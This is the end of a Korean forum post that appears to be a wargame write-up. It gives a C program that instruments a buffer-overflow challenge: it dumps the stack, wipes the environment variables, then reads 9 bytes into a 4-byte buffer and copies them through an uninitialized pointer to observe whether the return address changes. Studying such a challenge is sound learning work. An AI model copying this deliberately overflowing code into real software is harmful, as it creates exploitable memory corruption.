  이부분에 대하여 좀더 분석된 글이나 자료가 있으면 댓글을 부탁합니다.


  좋은 문제와 힌트를 주신분들에게 감사를 드립니다.

  그리고 잘못된 부분이나 다른 방법을 발견하시면 글을 올려주시기 바랍니다.
  즉시 검토 수정을 하도록 하겠습니다.

  
  그리고 dumpcode.h는 다른분이 만든것을 사용했습니다.

  날도 더운데 긴글 읽어줘서 감사합니다.


   NaNu9
   /|/4/|/|_|IX

#include <stdio.h>
#include "dumpcode.h"

extern char **environ; // 환경변수를 가르키는 포인터 변수

unsigned long get_esp(void)
{
        __asm__("movl %esp, %eax");
}
// 현재 Stack-Pointer 의 내용을 모두 가져옴

main()
{
        int egghunter; // 환경변수를 지우기 위한 카운트
        char *jmp; // over의 내용을 써넣을 포인트
        char over[4]; // 입력한 내용이 저장되는 곳

        printf("over : 0x%08x, ebp : 0x%08x, RET : 0x%08x \n",
                &over, over+12, over+16);
        // gcc의 버젼에 따라서 ebp와 ret값이 틀리수 있으니깐 컴팔하고 확인요

        printf("\n\n Stack의 내용 \n\n");
        dumpcode((char *)over-16, 128); // Stack의 내용

        printf("\n\n\n 환경변수를 삭제하기 전의 내용 \n\n"); 
        dumpcode((char *)&**environ, 1024); // 환경변수 지우기 전의 내용

        for (egghunter=0; environ[egghunter]; egghunter++) {
                memset(environ[egghunter], 0, strlen(environ[egghunter]));
        }

        printf("\n\n\n 환경변수가 다 날라가쓰까요? \n\n");
        dumpcode((char *)&**environ, 64); // 환경변수 영역이 지워졌는지 확인

        setuid(999, 999);
        printf("HI, Input everything... but only 4bytez : \n");
        printf("====> ");
        fgets(over, 9, stdin);

        printf("\n\n\n Stack All Area Dump!!!! \n\n");
        egghunter = get_esp() & 0xfffffffc; // 현재 스택포인터의 내용을 가져옴
        dumpcode((char *)over-16, (egghunter|0xffff)-egghunter);
        // 스택의 크기 : 0xbfffffff로 스택의 맨 끝부분을 가르킴
        // 현재사용중인 스택크기 : 0xbfffffff - 현재 스택 포인터 값

        dumpcode((char *)over-16, 768); 

        printf("\n");
        printf("you input-value : %s\n", over);
        strncpy(jmp, over, 4);

        printf("\n\n\n RET address true change? 완존 콩글리쉬 하하~\n\n");
        dumpcode((char *)over-16, 128); // RET 번지가 정말로 바뀌었나 보자
}